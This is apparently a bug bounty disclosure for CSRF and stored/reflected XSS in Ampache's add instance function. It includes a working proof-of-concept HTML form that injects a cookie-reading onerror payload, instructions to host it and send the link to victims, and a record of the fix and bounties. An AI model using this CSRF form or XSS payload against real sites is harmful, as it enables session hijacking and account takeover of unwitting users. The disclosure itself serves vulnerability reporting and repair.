CSRF, Reflected XSS and Stored XSS in add instance function in ampache/ampache


Reported on

Jan 15th 2023


The add instance function allows to creation of an instance from user input but does not have any sanitizing mechanism which results in a Reflected XSS bug. This feature can be made by any user in the system, including guest users. After creating the instance will be saved on the system, and when someone executes the add instance function, the payload will be triggered again. This is the stored XSS

Proof of Concept

// exploit.html
  <!-- CSRF PoC - generated by Burp Suite Professional -->
  <script>history.pushState('', '', '/')</script>
    <form action="http://localhost:8888/ampache-5.5.6_all_php7.4/public/localplay.php?action=add_instance" method="POST">
      <input type="hidden" name="name" value="test<img/src=x onerror=alert(document.cookie)>" />
      <input type="hidden" name="host" value="test" />
      <input type="hidden" name="port" value="80" />
      <input type="hidden" name="password" value="80" />
      <input type="submit" value="Submit request" />

Save this file on the internet, then send a link containing this file to any user, javascript code will execute an instance will be created.


Run code javascript in the victim's session which leads to account takeover and performs actions as that user

We are processing your report and will contact the ampache team within 24 hours. 2 months ago
We have contacted a member of the ampache team and are waiting to hear back 2 months ago
lachlan validated this vulnerability 2 months ago

I've fixed this by scrubbing the output instead of the input.

I don't usually like marking things an admin can do wrong by choicvalid if you're an admin

d47sec has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
lachlan marked this as fixed in 5.5.7,develop with commit 9605da 2 months ago
lachlan has been awarded the fix bounty
This vulnerability will not receive a CVE
This vulnerability is scheduled to go public on Feb 10th 2023
lachlan published this vulnerability a month ago
to join this conversation